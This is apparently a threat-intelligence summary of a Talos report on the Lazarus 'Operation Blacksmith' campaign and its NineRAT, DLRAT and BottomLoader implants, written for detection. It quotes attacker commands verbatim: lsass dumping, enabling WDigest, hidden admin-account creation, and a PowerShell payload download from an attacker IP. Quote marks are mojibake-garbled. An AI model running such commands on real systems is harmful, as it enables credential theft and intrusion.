Keypoints
- Cisco Talos identified âOperation Blacksmith,â a Lazarus campaign using three DLang-based malware families: NineRAT (Telegram C2 RAT), DLRAT (RAT/downloader) and BottomLoader (downloader).
- Initial access was achieved via exploitation of CVE-2021-44228 (Log4Shell) on public-facing servers (e.g., VMware Horizon), followed by deployment of custom implants and HazyLoad reverse proxy.
- NineRAT is modular (dropper â instrumentor nsIookup.exe â payload), uses Telegram bots/channels for C2 (getMe, sendDocument, getFile) and supports file upload/download and numerous remote commands.
- Persistence and execution techniques include service creation via sc create, BAT scripts, Startup .URL files, and creation of a local administrative account for hands-on-keyboard activity.
- BottomLoader uses hardcoded URLs and PowerShell (Invoke-WebRequest, UploadFile) to retrieve and upload payloads and can persist by creating a .URL in the Startup folder.
- DLRAT shares a hardcoded session ID observed previously in MagicRAT and performs reconnaissance, file transfer, download, rename, sleep and self-delete commands via multipart C2 posts.
- Talos published extensive IOCs (file hashes, domains, IPs, file names, Telegram bot) and detection guidance; IOCs are available in their GitHub repository.
MITRE Techniques
- [T1082] System Information Discovery â Used by implants to fingerprint hosts via commands like âwhoamiâ, âipconfig /allâ and âwmic os get osarchitectureâ (âcmd.exe /C ipconfig /allâ, âwhoamiâ).
- [T1518] Software Discovery â Malware queries installed security products using WMIC to detect antivirus (âWMIC /Node:localhost /Namespace:rootSecurityCenter2 Path AntiVirusProduct Get displayNameâ).
- [T1003/005] OS Credential Dumping: WDigest â Actors read or enable WDigest to harvest credentials (âReg query HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlSecurityProvidersWdigestâ, âreg add HKLMSYSTEMCurrentControlSetControlSecurityProvidersWDigest /v UseLogonCredential /t REG_DWORD /d 1â).
- [T1003] Credential Dumping â Operators run credential tools and memory dumps to harvest credentials (âprocdump.exe -accepteula -ma lsass.exe lsass.dmpâ, âpwdump.exe //Mimikatzâ).
- [T1112] Modify Registry â Used to change registry keys to enable credential harvesting (see âreg add ⌠UseLogonCredentialâ).
- [T1136] Create Account â The attackers create a local admin user for persistence and hands-on-keyboard activity (ânet user krtbgt /addâ, ânet localgroup Administrators krtbgt /addâ).
- [T1033] User Discovery â The campaign enumerates local and domain user/group info (âcmd.exe /c net localgroup Administratorsâ, ânet userâ).
Indicators of Compromise
- [File Hashes] Malware file hashes â NineRAT example: 534f5612954db99c86baa67ef51a3ad88bc21735bce7bb591afa8a4317c35433; HazyLoad: 000752074544950ae9020a35ccd77de277f1cd5026b4b9559279dc3b86965eee (and 10 more hashes).
- [Domains / URLs] C2 and payload hosts â tech[.]micrsofts[.]com, tech[.]micrsofts[.]tech and hxxp://27[.]102[.]113[.]93/inet[.]txt.
- [IP Addresses] Network IOCs used for hosting and C2 â 27[.]102[.]113[.]93, 201[.]77[.]179[.]66 (and additional IPs listed in the report).
- [File Names] Dropper/instrumentor and payload filenames â nsIookup.exe (instrumentor with capital âIâ trick), wininet64.exe / inetmgr.exe (HazyLoad/loader names used in commands).
- [Telegram] Telegram C2 artifacts â public bot â@StudyJ001Botâ (initially used) and other operator-owned bot tokens/channels referenced in NineRAT configuration.
Operation Blacksmithâs technical flow begins with exploitation of CVE-2021-44228 on exposed services, followed by scripted reconnaissance and payload retrieval. Operators run discovery commands (whoami, ipconfig /all, wmic queries), download and execute the HazyLoad reverse proxy via PowerShell (e.g., (New-Object System.Net.WebClient).DownloadFile(âhxxp:///inet.txtâ,âc:windowsadfsdeinetmgr.exeâ) and c:windowsadfsdeinetmgr.exe -i -p), and in some cases restart HazyLoad with new remote parameters to maintain access. They also create local administrative accounts (net user ⌠/add; net localgroup Administrators ⌠/add) and harvest credentials using procdump and mimikatz-style tools.
NineRAT is delivered via a dropper that writes two embedded components and removes itself; the instrumentor (nsIookup.exe â note the capital âIâ) sets persistence with a service creation command (sc create Aarsvc_XXXXXX binPath=c:windowssystem32nsIookup.exe -k AarSvcGroup -p type=own start=auto âŚ) and launches the RAT payload. NineRAT communicates over Telegram using DLang libraries and Telegram API methods (getMe, sendDocument, getFile), supports file transfer and numerous remote commands (e.g., /info, /sendfile, /upgrade, /uninstall), and may use two API tokens for separate channels.
BottomLoader and DLRAT are additional DLang components: BottomLoader downloads next-stage binaries via PowerShell Invoke-WebRequest and can persist by creating a .URL file in the Startup folder to run download commands; it can also upload files using (New-Object System.Net.WebClient).UploadFile. DLRAT performs system fingerprinting (ver, whoami, getmac), posts multipart session data (hardcoded session ID same as MagicRAT), and supports commands for download, upload, rename, sleep and self-deletion. Detection should focus on the PowerShell download/upload strings, service creation entries for nsIookup.exe, Startup .URL artifacts, the listed hashes and the Telegram bot communication patterns.
Read more: https://blog.talosintelligence.com/lazarus_new_rats_dlang_and_telegram/